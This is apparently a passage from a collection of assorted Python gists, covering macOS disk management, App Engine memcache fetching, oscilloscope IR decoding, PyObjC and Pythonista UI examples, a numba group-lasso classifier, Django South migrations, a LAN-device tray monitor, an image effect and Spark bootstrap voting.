session_p = DASessionRef(c_void_p=(session.__c_void_p__().value))
# connect the DA session
self.shared.setDefaultDASession_(session_p)
self.shared.setLanguage_('English')
# init the CS manager
self.shared_cs = DMCoreStorage.alloc().initWithManager_(self.shared)
def __init__(self):
self.shared = None
self.shared_cs = None
self.setup_managers()
def _formatted_disks(self, disk_list):
all_disks = sorted([diskRef(d, self) for d in disk_list], key=lambda x: x.devname)
return diskList(all_disks)
@property
def topLevelDisks(self):
return self._formatted_disks(self.shared.topLevelDisks())
@property
def disks(self):
return self._formatted_disks(self.shared.disks())
def diskForPath(self, path):
return diskRef(self.shared.diskForPath_error_(path, None), self, rawRef=True)
# Example usage
#
# from diskman import diskManager
# dm = diskManager()
#
# >>> dm.disks
# [<DADisk 0x7fd748434520 [0x7fff7c0b1440]>{id = /dev/disk0}, <DADisk 0x7fd748434550 [0x7fff7c0b1440]>{id = /dev/disk0s1}, ...
#
# >>> dm.diskForPath('/')
# <DADisk 0x7fa041c1a180 [0x7fff7c0b1440]>{id = /dev/disk1}
#
# >>> dm.diskForPath('/').volname
# u'Macintosh HD'
#
# >>> dm.diskForPath('/').devname
# u'/dev/disk1'
#
# >>> dm.disks['/dev/disk1'].facts
# ['AppleDiskImage', 'AppleRAIDDisk', 'AppleRAIDMemberDisk', 'AppleRAIDSetDisk', 'AppleRAIDSpareDisk', 'AppleRAIDUUID', ...
#
# >>> dm.disks['/dev/disk1'].Is('EjectableDisk')
# 0
#
# >>> dm.disks['/dev/disk1'].Is('InternalDisk')
# 1
```
#### File: hard-gists/5f59050155c3159c2185/snippet.py
```python
def checkMayaGuiBatchMode():
"""
Maya tip on detecting Maya Batch mode is from <NAME>'s blog post "MEL Sillyness":
http://www.scarpa.name/2010/12/16/mel-sillyness/
"""
# Check if Maya is running in batch mode or with a GUI
import maya.OpenMaya
isMayaInBatchMode = maya.OpenMaya.MGlobal.mayaState() == maya.OpenMaya.MGlobal.kBatch
return isMayaInBatchMode
# Check if Maya is running in Batch mode or with a GUI
# 1 means Batch Mode, 0 means GUI mode
isMayaInBatchMode = checkMayaGuiBatchMode()
```
#### File: hard-gists/600fa8852b4741fb2bb1/snippet.py
```python
import logging
from google.appengine.api import memcache
from google.appengine.ext import ndb
from google.appengine.ext.ndb.google_imports import entity_pb
from google.appengine.ext.ndb.google_imports import ProtocolBuffer
from google.appengine.ext.ndb import model
def get_multi(keys):
""" A drop-in replacement of ndb.get_multi.
This version is much faster when fetching many small objects which are mostly in memcache.
The two functional differences from ndb are:
--all keys must belong to the same namespace
--Doesn't interact with ndb autobatcher.
Speedup depends on the memcache hit rate:
100%: 3x faster.
80%: 1.7x faster.
50%: about parity.
<10%: about 20% slower.
The code is closely based on ndb's own code, but avoids a lot of overhead (seemingly in their task queue code).
@param keys: list of Keys
@type keys: ndb.Key
@return: list of entities
@rtype: list
"""
if not keys:
return
ctx = ndb.get_context()
ns = keys[0].namespace()
# Check single namespace assumption.
for k in keys:
if k.namespace() != ns:
raise ValueError("All keys must belong to a single namespace.")
# First check the context cache.
results_from_context_cache = _get_from_context_cache(keys)
keys_from_context_cache = set([entity.key for entity in results_from_context_cache])
# Manually get from memcache anything not in context cache.
mkey_to_key = {key.urlsafe() : key for key in keys if key not in keys_from_context_cache}
# Strangely memcache.get_multi isn't instant even when key set is empty, so check explicitly.
if mkey_to_key:
memcache_response = memcache.get_multi(keys=mkey_to_key.keys(), key_prefix=ctx._memcache_prefix, namespace=ns)
else:
memcache_response = {}
# Any keys that are missing, use ndb to get them from the datastore.
# Potentially could be faster by also skipping ndb here and doing a lower-level get_multi to the datastore, but too much work.
keys_to_fetch_from_datastore = [key for mkey, key in mkey_to_key.iteritems() if mkey not in memcache_response and key not in keys_from_context_cache]
datastore_fetch_futures = ndb.get_multi_async(keys_to_fetch_from_datastore, use_memcache=False)
# Check if any results appeared in the context cache while memcache RPC was running.
late_results_from_context_cache = _get_from_context_cache(mkey_to_key.values())
if late_results_from_context_cache:
# Drop the corresponding memcache results, no need to deserialize twice.
for entity in late_results_from_context_cache:
memcache_response.pop(entity.key.urlsafe(), None)
# Deserialize the memcache results.
deserialized_memcache_entities = []
for mkey, mvalue in memcache_response.iteritems():
key = mkey_to_key[mkey]
if mvalue not in (ndb.context._LOCKED, None):
cls = model.Model._lookup_model(key.kind(), ctx._conn.adapter.default_model)
pb = entity_pb.EntityProto()
try:
pb.MergePartialFromString(mvalue)
except ProtocolBuffer.ProtocolBufferDecodeError:
logging.warning('Corrupt memcache entry found '
'with key %s and namespace %s' % (mkey, ns))
else:
entity = cls._from_pb(pb)
# Store the key on the entity since it wasn't written to memcache.
entity._key = key
if ctx._use_cache(key):
# Update in-memory cache.
ctx._cache[key] = entity
deserialized_memcache_entities.append(entity)
# Wait for datastore fetch of entities which were not in memcache.
ndb.Future.wait_all(datastore_fetch_futures)
entities_from_datastore = map(lambda r : r.get_result(), datastore_fetch_futures)
# For any keys which were not in memcache, write them to memcache.
# For a little extra speed, you could make this last call asynchronous and rely on caller to set @ndb.toplevel
entities_to_write_to_memcache = [e for e in entities_from_datastore if e]
ndb.put_multi(entities_to_write_to_memcache, use_datastore=False, use_cache=False)
all_results = (results_from_context_cache + late_results_from_context_cache +
deserialized_memcache_entities + entities_from_datastore)
# Order results to match keys requested.
key_to_entity = {entity.key : entity for entity in all_results if entity}
return [key_to_entity.get(k) for k in keys]
def _get_from_context_cache(keys):
"""Get from ndb context cache"""
ctx = ndb.get_context()
results = []
for key in keys:
if ctx._use_cache(key) and key in ctx._cache:
entity = ctx._cache[key]
if entity and entity._key == key:
results.append(entity)
return results
def test_get_multi(keys):
"""Check get_multi is identical to ndb get_multi"""
entities = get_multi(keys)
ndb_entities = ndb.get_multi(keys)
returned_entity_keys = set([e.key.id() for e in entities])
ndb_returned_entity_keys = set([e.key.id() for e in ndb_entities])
assert(returned_entity_keys == ndb_returned_entity_keys)
```
#### File: hard-gists/6027183/snippet.py
```python
import array
import sys
import time
import visa
# Get the USB device, e.g. 'USB0::0x1AB1::0x0588::DS1ED141904883'
instruments = visa.get_instruments_list()
usb = filter(lambda x: 'USB' in x, instruments)
if len(usb) != 1:
print 'Bad instrument list', instruments
sys.exit(-1)
scope = visa.instrument(usb[0], timeout=20, chunk_size=1024000) # bigger timeout for long mem
# Oscilloscope can get confused if too many commands arrive too fast
def scopewrite(str):
scope.write(str)
time.sleep(.1)
# Set the scope the way we want it
scopewrite(':ACQ:MEMD LONG') # Long memory type
scopewrite(':CHAN1:COUP DC') # DC coupling
scopewrite(':CHAN1:DISP ON') # Channel 1 on
scopewrite(':CHAN2:DISP OFF') # Channel 1 off
scopewrite(':CHAN1:SCAL 1') # Channel 1 vertical scale 1 volts
scopewrite(':CHAN1:OFFS -2') # Channel 1 vertical offset 2 volts
scopewrite(':TIM:SCAL .01') # 10ms time interval
scopewrite(':TIM:OFFS .05') # Offset time 50 ms
scopewrite(':TRIG:EDGE:SOUR CHAN1') # Edge-trigger from channel 1
scopewrite(':TRIG:EDGE:SWE SING') # Single trigger
scopewrite(':TRIG:EDGE:COUP DC') # DC trigger coupling
scopewrite(':TRIG:EDGE:SLOP NEG') # Trigger on negative edge
scopewrite(':TRIG:EDGE:LEV 2.5') # Trigger at 2.5 volts
# Get the sample rate for processing the input data
sample_rate = scope.ask_for_values(':ACQ:SAMP?')[0]
while 1:
scopewrite(":RUN")
while scope.ask(':TRIG:STAT?') != 'STOP':
time.sleep(.2)
# Grab the raw data from channel 1, which will take about 10 seconds
scopewrite(":STOP")
scopewrite(":WAV:POIN:MODE RAW")
rawdata = scope.ask(":WAV:DATA? CHAN1")
# Convert data into high/low values, keeping in mind that rawdata is inverted
# First 10 bytes are header
data = array.array('B', rawdata[10:])
data = map(lambda x: x < 128, data)
# Decode an IR signal in NEC protocol
# For an explanation, see
# http://wiki.altium.com/display/ADOH/NEC+Infrared+Transmission+Protocol
def decode():
# Process data into list of milliseconds high, milliseconds low, milliseconds high, etc.
regions = []
state = data[0]
pos = 0
for i in range(1, len(data)):
if data[i] != state:
regions.append((i - pos) * 1000. / sample_rate)
pos = i
state = data[i]
if len(regions) < 64 or data[0] != True:
raise Exception('Wrong number of regions: %s' % regions)
# Make sure the received length is within 30% of the expected length
# Otherwise throw an exception
def expect(received, expected):
if received < .7 * expected or received > 1.3 * expected:
raise Exception('Wanted length %f vs %f\n%s' % (received, expected, regions))
# Process the header and 32 bits of data in the IR message
result = 0
expect(regions[1], 9) # 9 ms header mark
expect(regions[2], 4.5) # 4.5ms header space
for i in range(0, 32): # Loop over 32 bits
expect(regions[3 + 2*i], .5625) # 562.5 microseconds mark
if regions[4 + 2*i] > 1.000: # If more than 1 millisecond, must be a 1
expect(regions[4 + 2*i], 1.6875) # 1.6875ms mark for 1 bit
result = (result << 1) | 1
else:
expect(regions[4 + 2*i], .5625) # 562.5 us mark for 0 bit
result = result << 1
return result
try:
print '%x' % decode()
except Exception, e:
print 'Decode failed', e
```
#### File: hard-gists/60bacd65c89e5290f452/snippet.py
```python
from objc_util import *
## this is bad python styling, but I justify it by saying the
## function is an alias for the UIColor class
def UIColor(red=1.0, green=1.0, blue=1.0, alpha=1.0):
UIColor = ObjCClass('UIColor')
r = CGFloat(red)
g = CGFloat(green)
b = CGFloat(blue)
a = CGFloat(alpha)
return UIColor.colorWithRed_green_blue_alpha_(r,g,b,a)
## same goes for this function.
def UIImage(image_string):
from scene import get_image_path
UIImage = ObjCClass('UIImage')
img = UIImage.imageWithContentsOfFile_(get_image_path(image_string))
return img
## Just convenience class for progress view styles
class ProgressViewStyle:
DEFAULT = 0
BAR = 1
class ProgressView(ui.View):
@on_main_thread
def __init__(self, animated=True, *args, **kwargs):
ui.View.__init__(self, *args, **kwargs)
objc_view = ObjCInstance(self._objc_ptr)
UIProgressView = ObjCClass('UIProgressView')
f = CGRect(CGPoint(0, 0), CGSize(self.width, self.height))
progress_view = UIProgressView.alloc().initWithProgressViewStyle_(0)
progress_view.setFrame_(f)
progress_view.setBackgroundColor_(UIColor(*self.background_color))
flex_width, flex_height = (1<<1), (1<<4)
progress_view.setAutoresizingMask_(flex_width|flex_height)
progress_view.autorelease()
objc_view.addSubview_(progress_view)
self.progress_view = progress_view
self.animated = animated
@property
@on_main_thread
def progress(self):
progress_view = self.progress_view
progress = progress_view.progress()
return progress
@progress.setter
@on_main_thread
def progress(self,progress):
progress_view = self.progress_view
progress_view.setProgress_animated_(c_float(progress), self.animated)
@property
@on_main_thread
def progress_tint_color(self):
progress_view = self.progress_view
color = progress_view.progressTintColor()
return color
@progress_tint_color.setter
@on_main_thread
def progress_tint_color(self, color):
progress_view = self.progress_view
progress_view.setProgressTintColor_(UIColor(*color))
@property
@on_main_thread
def progress_image(self):
progress_view = self.progress_view
image = progress_view.progressImage()
return image
@progress_image.setter
@on_main_thread
def progress_image(self, image_string):
progress_view = self.progress_view
progress_view.setProgressImage_(UIImage(image_string))
@property
@on_main_thread
def track_tint_color(self):
progress_view = self.progress_view
color = progress_view.trackTintColor()
return color
@track_tint_color.setter
@on_main_thread
def track_tint_color(self, color):
progress_view = self.progress_view
progress_view.setTrackTintColor_(UIColor(*color))
@property
@on_main_thread
def progress_view_style(self):
progress_view = self.progress_view
return progress_view.progressViewStyle()
@progress_view_style.setter
@on_main_thread
def progress_view_style(self, style):
progress_view = self.progress_view
progress_view.setProgressViewStyle_(style)
def main():
import time
progress_view = ProgressView(frame=(0,0,300,50))
progress_view.name = 'Progress View Example'
progress_view.track_tint_color = (1.,0,0)
progress_view.progress_tint_color = (0,1.,0)
progress_view.present('sheet')
progress_view.progress = 0.0
for i in range(101):
progress_view.progress = i/100.
print 'Track Color:', progress_view.track_tint_color
print 'Progress Color:', progress_view.progress_tint_color
## commented out because I don't like the image I used and changing
## the style didn't seem to do anything
#progress_view.progress_image = 'test:Lenna'
#progress_view.progress_view_style = ProgressViewStyle.BAR
progress_view.progress = 0.0
for i in range(101):
progress_view.progress = i/100.
print 'Progress Image:', progress_view.progress_image
print 'Animated:', progress_view.animated
if __name__ == '__main__':
    ## Uncomment to show what other functions are available
#UIProgressView = ObjCClass('UIProgressView')
#print dir(UIProgressView.alloc())
main()
```
#### File: hard-gists/6105220/snippet.py
```python
import sys
import os
# We need to import the relevant object definitions from PyObjC
from AppKit import *
from PyObjCTools import AppHelper
# Cocoa prefers composition to inheritance. The members of an object's
# delegate will be called when certain events happen. Once we define
# methods with particular names, they will be called automatically
class Delegate (NSObject):
def applicationDidFinishLaunching_(self, aNotification):
'''Called automatically when the application has launched'''
print "Hello, World!"
def windowWillClose_(self, aNotification):
'''Called automatically when the window is closed'''
print "Window has been closed"
# Terminate the application
NSApp().terminate_(self)
def main():
# Create a new application instance ...
a=NSApplication.sharedApplication()
    # ... and create its delegate. Note the use of the
    # Objective-C constructors below, because Delegate
    # is a subclass of an Objective-C class, NSObject
delegate = Delegate.alloc().init()
# Tell the application which delegate object to use.
a.setDelegate_(delegate)
# Now we can can start to create the window ...
frame = ((200.0, 300.0), (250.0, 100.0))
# (Don't worry about these parameters for the moment. They just specify
# the type of window, its size and position etc)
w = NSWindow.alloc().initWithContentRect_styleMask_backing_defer_(frame, 15, 2, 0)
# ... tell it which delegate object to use (here it happens
# to be the same delegate as the application is using)...
w.setDelegate_(delegate)
# ... and set some properties. Unicode strings are preferred.
w.setTitle_(u'Hello, World!')
# All set. Now we can show the window ...
w.orderFrontRegardless()
# ... and start the application
AppHelper.runEventLoop()
if __name__ == '__main__':
main()
```
#### File: hard-gists/6165747/snippet.py
```python
from numba import jit
import numpy as np
import scipy.sparse as sp
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import LabelEncoder
from sklearn.utils.extmath import safe_sparse_dot
@jit("void(f8[:], i4[:], f8, f8[:])")
def _inv_step_sizes(X_data, X_indptr, scale, out):
"""Compute the block-wise inverse step sizes (Lipschitz constants)."""
n_features = out.shape[0]
for j in xrange(n_features):
sqnorm = 0
for k in xrange(X_indptr[j], X_indptr[j+1]):
sqnorm += X_data[k] * X_data[k]
out[j] = scale * sqnorm
@jit("void(f8[:], i4[:], i4[:], i4[:], f8[:,:], i4, f8, f8[:])")
def _grad(X_data, X_indices, X_indptr, y, A, j, C, out):
"""Compute the partial gradient for the j^th block
(vector of size n_classes)."""
n_classes = out.shape[0]
for r in xrange(n_classes):
for k in xrange(X_indptr[j], X_indptr[j+1]):
i = X_indices[k]
if y[i] == r:
continue
if A[r, i] > 0:
out[y[i]] -= 2 * C * A[r, i] * X_data[k]
out[r] += 2 * C * A[r, i] * X_data[k]
@jit("void(f8[:], i4, f8, f8, f8[:], f8[:, :])")
def _update_coef(grad, j, step_size, alpha, update, coef):
"""Update the j^th block of the coefficient matrix."""
n_classes = grad.shape[0]
update_norm = 0
for r in xrange(n_classes):
update[r] = coef[r, j] - step_size * grad[r]
update_norm += update[r] * update[r]
update_norm = np.sqrt(update_norm)
mu = alpha * step_size
scale = 1 - mu / update_norm
if scale < 0:
scale = 0
for r in xrange(n_classes):
old = coef[r, j]
coef[r, j] = scale * update[r]
update[r] = coef[r, j] - old
@jit("void(f8[:], i4[:], i4[:], i4[:], i4, f8[:], f8[:, :])")
def _update_A(X_data, X_indices, X_indptr, y, j, update, A):
"""Update matrix A (see paper)."""
n_classes = A.shape[0]
for r in xrange(n_classes):
for k in xrange(X_indptr[j], X_indptr[j+1]):
i = X_indices[k]
if y[i] == r:
continue
A[r, i] += (update[r] - update[y[i]]) * X_data[k]
@jit("f8(f8[:], f8[:], i4, f8)")
def _violation(grad, coef, j, alpha):
"""Compute optimality violation for the j^th block."""
n_classes = grad.shape[0]
coef_norm = 0
grad_norm = 0
for r in xrange(n_classes):
coef_norm += coef[r, j] * coef[r, j]
grad_norm += grad[r] * grad[r]
grad_norm = np.sqrt(grad_norm)
if coef_norm == 0:
violation = max(grad_norm - alpha, 0)
else:
violation = np.abs(grad_norm - alpha)
return violation
@jit("void(f8[:], i4[:], i4[:], i4[:], i4, f8, f8, f8, i4, f8[:,:])")
def _fit(X_data, X_indices, X_indptr, y, max_iter, alpha, C, tol,
verbose, coef):
n_samples = y.shape[0]
n_classes, n_features = coef.shape
inv_step_sizes = np.zeros(n_features, dtype=np.float64)
_inv_step_sizes(X_data, X_indptr, C * 4 * (n_classes-1), inv_step_sizes)
grad = np.zeros(n_classes, dtype=np.float64)
update = np.zeros(n_classes, dtype=np.float64)
A = np.ones((n_classes, n_samples), dtype=np.float64)
rs = np.random.RandomState(None)
violation_init = 0
for it in xrange(max_iter):
violation_max = 0
for _ in xrange(n_features):
j = rs.randint(n_features-1)
if inv_step_sizes[j] == 0:
continue
grad.fill(0)
_grad(X_data, X_indices, X_indptr, y, A, j, C, grad)
violation = _violation(grad, coef, j, alpha)
_update_coef(grad, j, 1. / inv_step_sizes[j], alpha, update, coef)
_update_A(X_data, X_indices, X_indptr, y, j, update, A)
if violation > violation_max:
violation_max = violation
if it == 0:
violation_init = violation_max
if verbose >= 1:
print violation_max / violation_init
if violation_max / violation_init < tol:
if verbose >= 1:
print "Converged at iter", it + 1
break
class SparseMulticlassClassifier(BaseEstimator, ClassifierMixin):
def __init__(self, alpha=1, C=1, max_iter=20, tol=0.05, verbose=0):
self.alpha = alpha
self.C = C
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
def fit(self, X, y):
X = sp.csc_matrix(X)
n_samples, n_features = X.shape
self._enc = LabelEncoder()
y = self._enc.fit_transform(y).astype(np.int32)
n_classes = len(self._enc.classes_)
self.coef_ = np.zeros((n_classes, n_features), dtype=np.float64)
_fit(X.data, X.indices, X.indptr, y, self.max_iter,
self.alpha, self.C, self.tol, self.verbose, self.coef_)
return self
def decision_function(self, X):
return safe_sparse_dot(X, self.coef_.T)
def predict(self, X):
pred = self.decision_function(X)
pred = np.argmax(pred, axis=1)
return self._enc.inverse_transform(pred)
def n_nonzero(self, percentage=False):
n_nz = np.sum(np.sum(self.coef_ != 0, axis=0, dtype=bool))
if percentage:
n_nz /= float(self.coef_.shape[1])
return n_nz
if __name__ == '__main__':
import time
from sklearn.datasets import fetch_20newsgroups_vectorized
bunch = fetch_20newsgroups_vectorized(subset="all")
X = bunch.data
y = bunch.target
print X.shape
s = time.time()
clf = SparseMulticlassClassifier(C=1./X.shape[0], alpha=1e-4, tol=1e-3,
max_iter=20, verbose=0)
clf.fit(X, y)
training_time = time.time() - s
print "Numba"
print training_time
print clf.score(X, y)
print clf.n_nonzero(percentage=True)
print
from lightning.primal_cd import CDClassifier
clf = CDClassifier(C=1./X.shape[0], alpha=1e-4, tol=1e-3, max_iter=20,
multiclass=True, penalty="l1/l2", shrinking=False,
max_steps=0, selection="uniform", verbose=0)
s = time.time()
clf.fit(X, y)
training_time = time.time() - s
print "Cython"
print training_time
print clf.score(X, y)
print clf.n_nonzero(percentage=True)
print
```
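A hedged aside, not from the gist: the block update in `_update_coef` is the proximal operator of the group-lasso (l1/l2) penalty, which shrinks a whole block of coefficients toward zero and zeroes it out entirely when its norm falls below the threshold. A standalone NumPy sketch of that shrinkage step:

```python
import numpy as np

def group_soft_threshold(u, mu):
    """Return the prox of mu*||.||_2 at u: max(0, 1 - mu/||u||) * u."""
    norm = np.linalg.norm(u)
    if norm == 0.0:
        return u
    return max(0.0, 1.0 - mu / norm) * u

# A block with small norm is zeroed, a large one is only shrunk.
print(group_soft_threshold(np.array([0.1, -0.1]), mu=1.0))  # -> [0. 0.]
print(group_soft_threshold(np.array([3.0, 4.0]), mu=1.0))   # -> [2.4 3.2]
```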
#### File: hard-gists/6168003/snippet.py
```python
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from django.db.models import get_app, get_models
class Migration(SchemaMigration):
# old_name => new_name
apps_to_rename = {
'some_old_app' : 'some_new_app',
'another_old_app' : 'another_new_app'
}
def forwards(self, orm):
for old_appname, new_appname in self.apps_to_rename.items():
# Renaming model from 'Foo' to 'Bar'
db.execute("UPDATE south_migrationhistory SET app_name = %s WHERE app_name = %s", [new_appname, old_appname])
db.execute("UPDATE django_content_type SET app_label = %s WHERE app_label = %s", [new_appname, old_appname])
app = get_app(new_appname)
for model in get_models(app, include_auto_created=True):
if model._meta.proxy == True:
continue
new_table_name = model._meta.db_table
old_table_name = old_appname + new_table_name[len(new_appname):]
db.rename_table(old_table_name, new_table_name)
def backwards(self, orm):
for old_appname, new_appname in self.apps_to_rename.items():
# Renaming model from 'Foo' to 'Bar'
db.execute("UPDATE south_migrationhistory SET app_name = %s WHERE app_name = %s", [old_appname, new_appname])
db.execute("UPDATE django_content_type SET app_label = %s WHERE app_label = %s", [old_appname, new_appname])
app = get_app(new_appname)
for model in get_models(app, include_auto_created=True):
if model._meta.proxy == True:
continue
old_table_name = model._meta.db_table
new_table_name = old_appname + old_table_name[len(new_appname):]
db.rename_table(old_table_name, new_table_name)
```
#### File: hard-gists/6201049/snippet.py
```python
import os, gtk, gobject, time, appindicator, subprocess, time, pynotify, threading
gobject.threads_init()
bits_raw = """32 255.255.255.255
31 255.255.255.254
30 255.255.255.252
29 255.255.255.248
28 255.255.255.240
27 255.255.255.224
26 255.255.255.192
25 255.255.255.128
24 255.255.255.0
23 255.255.254.0
22 255.255.252.0
21 255.255.248.0
20 255.255.240.0
19 255.255.224.0
18 255.255.192.0
17 255.255.128.0
16 255.255.0.0
15 255.254.0.0
14 255.252.0.0
13 255.248.0.0
12 255.240.0.0
11 255.224.0.0
10 255.192.0.0
9 255.128.0.0
8 255.0.0.0
7 254.0.0.0
6 252.0.0.0
5 248.0.0.0
4 240.0.0.0
3 224.0.0.0
2 192.0.0.0
1 128.0.0.0
0 0.0.0.0"""
bits = {}
for bit in bits_raw.split("\n"):
v,k = bit.split(" ")
bits[k] = v
show_notifications = True
def switch_show_notifications(checkmenuitem):
global show_notifications
show_notifications = checkmenuitem.get_active()
hosts_notifier_ar = []
def hosts_notifier(hosts):
global hosts_notifier_ar
new_hosts = []
disconnected_hosts = []
for host in hosts:
if not host in hosts_notifier_ar:
new_hosts.append(host)
hosts_notifier_ar += new_hosts
for host in hosts_notifier_ar:
if not host in hosts:
disconnected_hosts.append(host)
for host in disconnected_hosts:
hosts_notifier_ar.remove(host)
if show_notifications:
notification_message = ""
if len(new_hosts)==1:
notification_message += "One new device joined network ("+new_hosts[0]+")\n"
elif len(new_hosts)>1:
notification_message += str(len(new_hosts))+" New devices joined network\n"
if len(disconnected_hosts)==1:
notification_message += "One device disconnected from network ("+disconnected_hosts[0]+")\n"
elif len(disconnected_hosts)>1:
notification_message += str(len(disconnected_hosts))+" Devices disconnected from network\n"
if notification_message!="":
n = pynotify.Notification("Nadar", notification_message.strip())
helper = gtk.Button()
icon = helper.render_icon(gtk.STOCK_NETWORK, gtk.ICON_SIZE_DIALOG)
n.set_icon_from_pixbuf(icon)
n.show()
def get_interfaces():
# ifconfig -s
ifconfig = subprocess.check_output(['ifconfig','-s'])
devices = []
for line in ifconfig.split("\n")[1:-1]:
device = line.split(" ")[0]
if device!="lo": # add al interfaces except loopback
devices.append(device)
return devices
def get_ip_mask(device):
# ifconfig eth0
ifconfig = subprocess.check_output(['ifconfig', device])
for line in ifconfig.split("\n"):
current_line = line.strip()
if current_line.startswith('inet addr'):
components = [x for x in current_line.strip().split(' ') if len(x)>0]
ip_address = components[0].split(':')[1]
subnet_mask = components[2].split(':')[1]
if bits.has_key(subnet_mask):
return (ip_address,bits[subnet_mask])
return False
def get_default_gateways():
# nm-tool | grep Gateway | awk '{print $2}'
# man, i love that line :D it feels like magic
return [ x.strip().split(" ")[-1] for x in subprocess.check_output('nm-tool').split("\n") if x.find("Gateway")>-1 ]
def get_hosts(device):
# nmap -sn ip/bits
try:
ip_mask = get_ip_mask(device)
arp_scan = subprocess.check_output(['nmap', '-sn', ip_mask[0]+'/'+ip_mask[1]])
gateways = get_default_gateways()
hosts = []
for line in arp_scan.split("\n"):
# filter lines to the ip lines only
if line.startswith('Nmap scan report for '):
host = line[line.rfind(' ')+1:]
# don't add current machine ip address and don't add gateways
if host!=ip_mask[0] and not host in gateways:
hosts.append(host)
return hosts
except Exception as e:
return []
def control_menu_items(menu_obj):
separator = gtk.SeparatorMenuItem()
menu_obj.append(separator)
separator.show()
show_notifications_menuitem = gtk.CheckMenuItem("Show notifications")
show_notifications_menuitem.set_active(show_notifications)
show_notifications_menuitem.connect('toggled', switch_show_notifications)
menu_obj.append(show_notifications_menuitem)
show_notifications_menuitem.show()
quit_item = gtk.MenuItem("Exit")
quit_item.connect('activate', gtk.main_quit)
menu_obj.append(quit_item)
quit_item.show()
class Refresh_menu(threading.Thread):
def __init__(self, devices, menu):
super(Refresh_menu, self).__init__()
self.quit = False
self.hosts = []
self.devices = devices
self.menu = menu
def update_menu(self):
for i in self.menu.get_children():
self.menu.remove(i)
for host in self.hosts:
menu_item = gtk.MenuItem(host)
self.menu.append(menu_item)
menu_item.show()
control_menu_items(self.menu)
hosts_notifier(self.hosts)
return False
def run(self):
while not self.quit:
self.refresh_hosts()
gobject.idle_add(self.update_menu)
time.sleep(5)
def refresh_hosts(self):
self.hosts = []
for device in self.devices:
if not self.quit:
self.hosts += get_hosts(device)
return False
devices = get_interfaces()
menu = gtk.Menu()
control_menu_items(menu)
ind = appindicator.Indicator ("nadar",
"preferences-system-network",
appindicator.CATEGORY_APPLICATION_STATUS)
ind.set_status (appindicator.STATUS_ACTIVE)
ind.set_menu(menu)
pynotify.init("Nadar")
t = Refresh_menu(devices, menu)
t.start()
gtk.main()
os._exit(0)
```
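The `bits_raw` table above only maps dotted netmasks to CIDR prefix lengths. A hedged computed alternative (not part of the gist) that yields the same prefix for any valid mask:

```python
def mask_to_prefix(netmask):
    """Count the set bits in a dotted netmask, e.g. 255.255.255.0 -> 24."""
    return sum(bin(int(octet)).count("1") for octet in netmask.split("."))

print(mask_to_prefix("255.255.255.0"))  # -> 24
```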
#### File: hard-gists/6327611/snippet.py
```python
import Image
#Created by vvdr12
#Fully open license. Have fun.
#change threshold value in 'def contrastpoints' for higher/lower line density.
#put a 'test.jpg' file in the same folder as the code.
#_functions______________________________________________
def contrastpoints(x,j,img):
threshold=20
contrast=[]
i=0
l2=1
while l2==1:
r1=img[i,j][0]
b1=img[i,j][1]
g1=img[i,j][2]
ave1=((r1+b1+g1)/3)
r2=img[(i+1),j][0]
b2=img[(i+1),j][1]
g2=img[(i+1),j][2]
ave2=((r2+b2+g2)/3)
r3=img[(i+2),j][0]
b3=img[(i+2),j][1]
g3=img[(i+2),j][2]
ave3=((r3+b3+g3)/3)
r4=img[(i+3),j][0]
b4=img[(i+3),j][1]
g4=img[(i+3),j][2]
ave4=((r4+b4+g4)/3)
if abs(ave2-ave1)>threshold:
if abs(ave1-ave3)>(threshold/2):
contrast.append(i)
i=i+1
if i==(x-3):
l2=0
return contrast
#_Page_Setup____________________________________________
source = Image.open("test.jpg")
img = source.load()
print source.format
print source.size
print source.mode
x = source.size[0]
y = source.size[1]
#_______________________________________________________
i=0
j=0#set to 500 for short test run
k=0
l=0
m=0 #contrast func
l1=1
contrast=contrastpoints(x,j,img) #contrast func
print "\n", j, "/", y
while (l1==1):
if len(contrast)>m: #contrast func
if i>=contrast[m]:
img[i,j]=(0,0,0)
m=m+1
i=i+1
if i==(x-1):
contrast=contrastpoints(x,j,img) #contrast func
m=0 #contrast func
i=0
k=k+1
if k==1:
k=0
j=j+1
print j, "/",y
if j==y: #set to 510 for short test run
l1=0
source.save("japanify.png")
```
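A hedged, vectorized restatement (not from the gist) of the per-row contrast test that `contrastpoints` performs: a column qualifies when the brightness jump to the next pixel exceeds the threshold and the jump two pixels ahead exceeds half of it.

```python
import numpy as np

def contrast_columns(row, threshold=20):
    """row: (width, 3) array of RGB values for one scanline."""
    ave = row.mean(axis=1)
    d1 = np.abs(ave[1:-1] - ave[:-2])   # |ave(i+1) - ave(i)|
    d2 = np.abs(ave[:-2] - ave[2:])     # |ave(i) - ave(i+2)|
    return np.nonzero((d1 > threshold) & (d2 > threshold / 2.0))[0]
```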
#### File: hard-gists/6454814/snippet.py
```python
from pyspark import SparkContext
import numpy as np
from sklearn.cross_validation import train_test_split, Bootstrap
from sklearn.datasets import make_classification
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
def run(sc):
def zero_matrix(n, m):
return np.zeros(n*m, dtype = int).reshape(n, m)
def vote_increment(y_est):
increment = zero_matrix(y_est.size, n_ys)
increment[np.arange(y_est.size), y_est] = 1
return increment # test point x class matrix with 1s marking the estimator prediction
X, y = make_classification()
X_train, X_test, y_train, y_test = train_test_split(X, y)
n_test = X_test.shape[0]
n_ys = np.unique(y_train).size
model = DecisionTreeClassifier()
# Partition the training data into random sub-samples with replacement.
samples = sc.parallelize(Bootstrap(y.size))
# Train a model for each sub-sample and apply it to the test data.
vote_tally = samples.map(lambda (index, _):
model.fit(X[index], y[index]).predict(X_test)
).map(vote_increment).fold(zero_matrix(n_test, n_ys), np.add) # Take the learner majority vote.
y_estimate_vote = np.argmax(vote_tally, axis = 1)
return accuracy_score(y_test, y_estimate_vote)
if __name__ == '__main__':
print run(SparkContext("local", "Boost"))
```
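A hedged, Spark-free illustration (not part of the gist) of the voting trick used above: each estimator's predictions become a one-hot "ballot" matrix, the ballots are summed, and argmax over the class axis recovers the majority vote per test point.

```python
import numpy as np

def vote_increment(y_est, n_classes):
    ballot = np.zeros((y_est.size, n_classes), dtype=int)
    ballot[np.arange(y_est.size), y_est] = 1
    return ballot

# Three estimators voting on three test points with two classes.
preds = [np.array([0, 1, 1]), np.array([0, 1, 0]), np.array([1, 1, 0])]
tally = sum(vote_increment(p, n_classes=2) for p in preds)
print(np.argmax(tally, axis=1))  # -> [0 1 0], the per-point majority
```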
#### File: hard-gists/651afb13d45e4c587f63/snippet.py
```python
